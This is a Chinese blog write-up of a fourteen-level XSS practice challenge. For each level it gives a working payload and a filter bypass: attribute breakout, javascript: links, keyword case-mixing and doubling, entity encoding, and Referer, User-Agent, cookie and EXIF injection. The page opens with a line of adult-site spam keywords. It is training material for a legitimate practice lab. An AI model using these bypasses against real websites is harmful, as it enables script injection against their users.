日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

XSS挑战之旅 解题记录

發(fā)布時(shí)間:2023/12/14 编程问答 42 豆豆
生活随笔 收集整理的這篇文章主要介紹了 XSS挑战之旅 解题记录 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

本文記錄xss挑戰(zhàn)解題,檢驗(yàn)自己的xss技術(shù)
題目鏈接
Level1
鏈接為http://test.xss.tv/level1.php?name=test
頁面沒有輸入點(diǎn)
直接構(gòu)造payloadname=<script>alert(1)</script>

Level2
一樣簡單,給出payload"><script>alert(1)</script>

Level3
過濾了尖括號
故用`’ οnclick=alert(1)//

Level4
和L3一樣,不同的是這里用雙引號閉合
" onclick=alert(1)//

Level5
用上面的進(jìn)行嘗試,發(fā)現(xiàn)將onclick變成o_nclick
這里改用添加鏈接方式
"><a href="javascript:alert(1)">
然后點(diǎn)擊鏈接即可

Level6
這里也將href過濾成hr_ef
這里用大小寫繞過過濾
"><a hrEf="javascript:alert(1)">

Level7
這里直接將href script刪除
于是采用機(jī)智方法
"><a hrhrefef="javascrscriptipt:alert(1)">

Level8
這里可以添加鏈接到頁面
于是直接javascript:alert(1)
但是不行因?yàn)闀cript過濾成scr_ipt
這里采用HTML字符實(shí)體轉(zhuǎn)換
將script轉(zhuǎn)化成&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;
最后payload java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)

Level9
使用上關(guān)的payload,被提示不合法,說明對鏈接進(jìn)行了格式要求
這里嘗試了很多次,最后看到網(wǎng)上的解答,吐血
因?yàn)檫@里只需要有http://即可
java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(&#x22;http://")
值得一提的是雙引號會被過濾,于是第一個(gè)雙引號用實(shí)體轉(zhuǎn)換機(jī)即可

Level10
看源碼,發(fā)現(xiàn)有幾個(gè)type=hidden的輸入框
于是使其顯示并可以onclick觸發(fā)事件
http://test.xss.tv/level10.php?t_sort=4" onclick=alert(1) type="text"

Level11
看源碼,有個(gè)是顯示referer
<input name="t_ref" value="http://test.xss.tv/level10.php?t_sort=4%22%20onclick=alert(1)%20type=%22text%22" type="hidden">
這里也是嘗試很多次,但是始終無法使得輸入框改變type
最后百度得出要抓包改referer即可
修改referer=12356" onclick=alert(1) type=text

Level12
和上一關(guān)類似,這次修改user-agent
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" onclick=alert(1) type="text"

Level13
看網(wǎng)頁源碼有個(gè)輸入框叫cook,故去看看cookie
果然有個(gè)cookie值為call me maybe
修改cookiecall me maybe?" onclick=alert(1) type="text"

Level14
這里也是沒思緒
百度得出答案,這里用的是烏云爆出的exif viewer的漏洞
修改圖片exif信息如標(biāo)題、作者' "><img src=1 onerror=alert(document.domain)>即可
之后第15關(guān)的鏈接失效了,就沒做下去了

總結(jié)

以上是生活随笔為你收集整理的XSS挑战之旅 解题记录的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。